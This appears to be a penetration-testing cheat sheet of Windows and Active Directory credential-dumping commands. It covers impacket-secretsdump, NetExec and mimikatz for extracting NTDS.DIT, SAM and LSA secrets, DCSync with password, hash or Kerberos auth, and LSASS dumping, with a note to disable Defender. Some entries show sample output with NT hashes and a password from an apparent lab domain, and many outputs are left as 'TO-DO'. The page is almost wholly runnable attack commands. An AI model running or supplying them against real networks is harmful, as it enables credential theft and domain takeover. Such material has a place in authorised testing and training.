Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Convert NTDS.DIT to .sqlite
ntdsdotsqlite ntds.dit --system SYSTEM -o ntds.sqlite
Sample Output:
TO-DORef: ntdsdotsqlite
With NTDS.DIT and SYSTEM Hive
impacket-secretsdump -ntds ntds.dit -system system LOCAL
Sample Output:
$ impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
---[SNIP]---
[*] Cleaning up...
With SAM, SYSTEM and SECURITY Hives
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Sample Output:
TO-DOreg save HKLM\SYSTEM SYSTEM
Sample Output:
TO-DOreg save HKLM\SECURITY SECURITY
Sample Output:
TO-DOreg save HKLM\SAM SAM
Sample Output:
TO-DO.\mimikatz.exe "lsadump::secrets /system:SYSTEM /security:SECURITY"
Sample Output:
TO-DO.\mimikatz.exe "lsadump::sam /system:SYSTEM /sam:SAM"
Sample Output:
TO-DOexecute "powershell" "reg save HKLM\SYSTEM C:\SYSTEM"
Sample Output:
TO-DOexecute "powershell" "reg save HKLM\SECURITY C:\SECURITY"
Sample Output:
TO-DOexecute "powershell" "reg save HKLM\SAM C:\SAM"
Sample Output:
TO-DOmimikatz -- '"lsadump::secrets /system:C:\SYSTEM /security:C:\SECURITY"'
Sample Output:
TO-DOmimikatz -- '"lsadump::sam /system:C:\SYSTEM /sam:C:\SAM"'
Sample Output:
TO-DOWith DCSync Right
# Password
impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---
# NTLM
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---
# Password-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper:NuclearMosquito3@dc.sequel.htb' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---
# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -hashes :98981eed8e9ce0763bb3c5b3c7ed5945 -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---
# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output:
$ impacket-secretsdump 'sequel.htb/ryan.cooper@dc.sequel.htb' -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
---[SNIP]---
# Password
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --ntds
Sample Output:
TO-DO# NTLM
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' --ntds
Sample Output:
TO-DO# Password-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --kdcHost <DC> --ntds
Sample Output:
TO-DO# NTLM-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --kdcHost <DC> --ntds
Sample Output:
TO-DO# Ticket-based Kerberos
nxc smb <TARGET> -d <DOMAIN> -u '<USER>' -k --kdcHost <DC> --use-kcache --ntds
Sample Output:
TO-DO.\mimikatz.exe "lsadump::dcsync /all" "exit"
Sample Output:
TO-DO# Dump old creds
.\mimikatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER> /history" "exit"
Sample Output:
TO-DOmimikatz -- '"lsadump::dcsync /all"' "exit"
Sample Output:
TO-DOWith SYSTEM / Administrator / LAPS
# Password
impacket-secretsdump '<USER>:<PASSWORD>@<TARGET>'
Sample Output:
TO-DO# NTLM
impacket-secretsdump '<USER>@<TARGET>' -hashes :<HASH>
Sample Output:
TO-DO# Password
nxc smb <TARGET> -u '<USER>' -p '<PASSWORD>' --local-auth -M lsassy
Sample Output:
TO-DO# NTLM
nxc smb <TARGET> -u '<USER>' -H <HASH> --local-auth -M lsassy
Sample Output:
TO-DONote: Disable Defender
.\mimikatz.exe "sekurlsa::logonpasswords"
Sample Output:
TO-DO.\mimikatz.exe "lsadump::lsa /patch"
Sample Output:
TO-DOmimikatz -- '"sekurlsa::logonpasswords"'
Sample Output:
TO-DOmimikatz -- '"lsadump::lsa /patch"'
Sample Output:
TO-DO